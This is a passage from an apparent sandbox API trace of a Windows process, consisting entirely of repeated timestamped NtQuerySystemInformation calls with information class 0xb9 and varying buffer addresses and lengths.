SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.873] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.873] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd060, Length=0x28, ResultLength=0x0) [0230.873] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.873] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.873] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd060, Length=0x28, ResultLength=0x0) [0230.873] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.873] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.873] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd0d0, Length=0x28, ResultLength=0x0) [0230.873] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.874] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.874] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd230, Length=0x38, ResultLength=0x0) [0230.874] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.874] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd150, Length=0x28, ResultLength=0x0) [0230.876] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.876] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.876] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.876] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.877] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.877] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd150, Length=0x28, ResultLength=0x0) [0230.877] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcff0, Length=0x20, ResultLength=0x0) [0230.877] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf70, Length=0x20, ResultLength=0x0) [0230.877] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.877] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf70, Length=0x20, ResultLength=0x0) [0230.877] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.877] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf70, Length=0x20, ResultLength=0x0) [0230.877] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.877] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.877] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.877] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.877] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.877] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd230, Length=0x38, ResultLength=0x0) [0230.877] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.877] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd230, Length=0x38, ResultLength=0x0) [0230.878] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd0b0, Length=0x20, ResultLength=0x0) [0230.878] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd040, Length=0x20, ResultLength=0x0) [0230.878] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.878] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.878] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.878] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd040, Length=0x20, ResultLength=0x0) [0230.878] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.878] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.878] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.878] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.878] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.878] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd310, Length=0x58, ResultLength=0x0) [0230.878] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.879] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd230, Length=0x38, ResultLength=0x0) [0230.880] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.880] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd060, Length=0x28, ResultLength=0x0) [0230.880] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.880] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.881] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd060, Length=0x28, ResultLength=0x0) [0230.881] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.881] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.881] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd060, Length=0x28, ResultLength=0x0) [0230.881] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.881] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.881] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd060, Length=0x28, ResultLength=0x0) [0230.881] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.881] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.881] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd0d0, Length=0x28, ResultLength=0x0) [0230.881] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.881] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.881] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd230, Length=0x38, ResultLength=0x0) [0230.882] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.882] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd150, Length=0x28, ResultLength=0x0) [0230.936] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.936] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.937] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.937] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.937] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.937] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd150, Length=0x28, ResultLength=0x0) [0230.937] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.937] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.937] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd230, Length=0x38, ResultLength=0x0) [0230.937] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd0b0, Length=0x20, ResultLength=0x0) [0230.937] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd030, Length=0x20, ResultLength=0x0) [0230.937] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.937] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd030, Length=0x20, ResultLength=0x0) [0230.937] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.938] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd030, Length=0x20, ResultLength=0x0) [0230.938] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.938] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.938] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.938] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.938] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd230, Length=0x38, ResultLength=0x0) [0230.938] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd0b0, Length=0x20, ResultLength=0x0) [0230.938] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd040, Length=0x20, ResultLength=0x0) [0230.938] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.938] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.938] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.938] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd040, Length=0x20, ResultLength=0x0) [0230.938] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.938] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.938] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.939] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.939] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.939] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd310, Length=0x58, ResultLength=0x0) [0230.939] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.939] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1f0, Length=0x38, ResultLength=0x0) [0230.941] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.941] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.943] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.943] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.943] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd030, Length=0x28, ResultLength=0x0) [0230.943] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.943] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.943] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd030, Length=0x28, ResultLength=0x0) [0230.943] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.943] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.943] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd030, Length=0x28, ResultLength=0x0) [0230.943] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.943] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.944] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd030, Length=0x28, ResultLength=0x0) [0230.944] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.944] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.944] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd0a0, Length=0x28, ResultLength=0x0) [0230.944] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.944] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.944] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1f0, Length=0x38, ResultLength=0x0) [0230.944] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.944] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1f0, Length=0x38, ResultLength=0x0) [0230.944] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.944] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd120, Length=0x28, ResultLength=0x0) [0230.947] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.947] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.947] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.947] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.947] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.947] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd120, Length=0x28, ResultLength=0x0) [0230.948] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.948] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.948] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1f0, Length=0x38, ResultLength=0x0) [0230.948] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.948] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1f0, Length=0x38, ResultLength=0x0) [0230.948] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.948] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.948] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.948] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.949] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.949] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf90, Length=0x20, ResultLength=0x0) [0230.949] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf10, Length=0x20, ResultLength=0x0) [0230.949] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.949] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf10, Length=0x20, ResultLength=0x0) [0230.949] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.949] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf10, Length=0x20, ResultLength=0x0) [0230.949] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.949] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.949] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.949] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd160, Length=0x20, ResultLength=0x0) [0230.949] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.949] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.949] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1f0, Length=0x38, ResultLength=0x0) [0230.949] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd080, Length=0x20, ResultLength=0x0) [0230.949] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd000, Length=0x20, ResultLength=0x0) [0230.949] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.949] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd000, Length=0x20, ResultLength=0x0) [0230.950] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.950] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd000, Length=0x20, ResultLength=0x0) [0230.950] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.950] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.950] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.950] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.950] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1f0, Length=0x38, ResultLength=0x0) [0230.950] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd080, Length=0x20, ResultLength=0x0) [0230.950] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd000, Length=0x20, ResultLength=0x0) [0230.950] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.950] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd000, Length=0x20, ResultLength=0x0) [0230.950] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.950] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd000, Length=0x20, ResultLength=0x0) [0230.950] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.950] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.950] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.950] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.951] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1f0, Length=0x38, ResultLength=0x0) [0230.951] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd080, Length=0x20, ResultLength=0x0) [0230.951] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd010, Length=0x20, ResultLength=0x0) [0230.951] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.951] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.951] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.951] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd010, Length=0x20, ResultLength=0x0) [0230.951] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.951] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.951] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.951] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.951] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.951] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.951] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.951] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd578, Length=0x50, ResultLength=0x0) [0230.952] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.952] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd4a0, Length=0x38, ResultLength=0x0) [0230.953] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.953] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd2d0, Length=0x28, ResultLength=0x0) [0230.953] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.953] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.954] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd2d0, Length=0x28, ResultLength=0x0) [0230.954] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.954] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.954] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd2d0, Length=0x28, ResultLength=0x0) [0230.954] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.954] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.954] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd2d0, Length=0x28, ResultLength=0x0) [0230.954] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.954] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.954] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd340, Length=0x28, ResultLength=0x0) [0230.954] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.954] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.954] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd4a0, Length=0x38, ResultLength=0x0) [0230.955] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.955] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd3c0, Length=0x28, ResultLength=0x0) [0230.957] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.957] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.957] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.957] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.957] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd3c0, Length=0x28, ResultLength=0x0) [0230.957] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.957] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.957] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd4a0, Length=0x38, ResultLength=0x0) [0230.957] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd320, Length=0x20, ResultLength=0x0) [0230.957] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd2a0, Length=0x20, ResultLength=0x0) [0230.957] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.958] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd2a0, Length=0x20, ResultLength=0x0) [0230.958] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.958] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd2a0, Length=0x20, ResultLength=0x0) [0230.958] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.958] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.958] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.958] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.958] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd4a0, Length=0x38, ResultLength=0x0) [0230.958] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd320, Length=0x20, ResultLength=0x0) [0230.958] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd2b0, Length=0x20, ResultLength=0x0) [0230.958] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.958] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.958] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.958] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd2b0, Length=0x20, ResultLength=0x0) [0230.958] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.959] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.959] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.959] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.959] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.959] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0230.959] NtQuerySystemInformation 